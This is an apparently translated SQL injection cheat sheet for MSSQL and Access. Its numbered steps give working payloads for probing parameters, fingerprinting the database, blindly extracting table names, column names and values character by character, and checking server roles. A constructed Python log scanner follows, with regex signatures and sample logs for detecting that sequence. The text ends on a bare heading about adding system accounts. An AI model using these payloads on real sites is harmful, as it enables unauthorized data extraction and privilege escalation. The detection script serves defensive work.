Placeholders inside the injection strings are kept as the author wrote them: [查询条件] is the query condition, 数据库名 is the table being queried (the author calls it the "database name"), and 字段名 is the column name.

1. Test whether the parameter is injectable: ;and 1=1 and ;and 1=2
2. First check whether the back end is MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [查询条件] and ''='
4. In a search form whose parameter is not filtered: 'and [查询条件] and '%25'='
5. Identify the database engine:
   ;and (select count(*) from sysobjects)>0    (MSSQL)
   ;and (select count(*) from msysobjects)>0   (Access)
6. Guess the table ("database") name: ;and (select Count(*) from [数据库名])>0
7. Guess a column name: ;and (select Count(字段名) from 数据库名)>0
8. Guess the length of a value in that column: ;and (select top 1 len(字段名) from 数据库名)>0
9. (1) Guess the ASCII value of each character (Access): ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
   (2) Guess the ASCII value of each character (MSSQL): ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10. Test the privilege level (MSSQL):
   ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
   ;and 1=(select IS_MEMBER('db_owner'));--
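Read from the defender's side, steps 1 to 10 form a recognisable sequence in web server logs: a boolean probe pair, a user>0 error probe, a sysobjects/msysobjects fingerprint, count/len/asc/unicode enumeration, then IS_SRVROLEMEMBER role checks. The script below is an added example and not part of the original cheat sheet; it URL-decodes each request target (twice, so the %25 form from step 4 collapses), matches it against one signature per stage, and flags a client that triggers several distinct stages. The log format, the signature names, the IP addresses and the sample lines are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One signature per probe stage from the cheat sheet. Patterns run against the
# URL-decoded, lower-cased request target. The stage names are labels chosen
# for this example, not identifiers from the original page.
PROBE_SIGNATURES = {
    "boolean_probe":         re.compile(r"\band\s+1\s*=\s*[12]\b"),          # step 1
    "mssql_user_probe":      re.compile(r"\band\s+user\s*>\s*0\b"),          # step 2
    "search_wildcard_probe": re.compile(r"'%'\s*=\s*'"),                      # step 4
    "mssql_fingerprint":     re.compile(r"\bfrom\s+sysobjects\b"),            # step 5
    "access_fingerprint":    re.compile(r"\bfrom\s+msysobjects\b"),           # step 5
    "count_enum":            re.compile(r"select\s+count\s*\("),              # steps 6-7
    "length_enum":           re.compile(r"select\s+top\s+1\s+len\s*\("),      # step 8
    "access_char_enum":      re.compile(r"asc\s*\(\s*mid\s*\("),              # step 9 (1)
    "mssql_char_enum":       re.compile(r"unicode\s*\(\s*substring\s*\("),    # step 9 (2)
    "role_check":            re.compile(r"is_(srvrole)?member\s*\("),         # step 10
}

# Constructed common-log-style line: client ident user [time] "METHOD target HTTP/x" status size
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize(target: str) -> str:
    """Decode twice so double-encoded payloads (e.g. %2527 -> %27 -> ') are seen in clear."""
    return unquote_plus(unquote_plus(target)).lower()


def classify(target: str) -> list:
    """Return the sorted list of probe stages whose signature matches this request target."""
    q = normalize(target)
    return sorted(name for name, pat in PROBE_SIGNATURES.items() if pat.search(q))


def scan_log(lines, chain_threshold: int = 3):
    """Return (hits, chains): every matching request, and clients that ran >= threshold stages."""
    per_client = defaultdict(set)
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        stages = classify(m.group("target"))
        if stages:
            hits.append((m.group("client"), m.group("target"), stages))
            per_client[m.group("client")].update(stages)
    chains = {c: sorted(s) for c, s in per_client.items() if len(s) >= chain_threshold}
    return hits, chains


# Constructed sample log: one client walking steps 1, 2, 5 and 10; one search-form probe; one clean request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /show.asp?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /show.asp?id=1;and+1=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /show.asp?id=1;and+1=2 HTTP/1.1" 200 412',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /show.asp?id=1;and+user>0 HTTP/1.1" 500 300',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /show.asp?id=1;and+(select+count(*)+from+sysobjects)>0 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "GET /show.asp?id=1;and+1=(select+IS_SRVROLEMEMBER(%27sysadmin%27));-- HTTP/1.1" 200 5120',
    '198.51.100.2 - - [10/Oct/2023:14:01:00 +0000] "GET /search.asp?q=%27and+1=1+and+%27%2525%27=%27 HTTP/1.1" 200 2000',
    '192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "GET /show.asp?id=42 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    found, escalations = scan_log(SAMPLE_LOG)
    for client, target, stages in found:
        print(f"{client} {target} -> {', '.join(stages)}")
    for client, stages in escalations.items():
        print(f"ALERT {client} ran {len(stages)} enumeration stages: {', '.join(stages)}")
```

The per-client stage count is the useful signal: a single `and 1=1` is noisy on its own, but one address that also sends `user>0`, a `sysobjects` count and an `IS_SRVROLEMEMBER` check within minutes is following the sequence above. The same regexes can be carried over to a WAF or SIEM rule; the real fix for the application is parameterised queries, which make steps 1 to 10 return the same page regardless of the payload.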
11. Add MSSQL and system accounts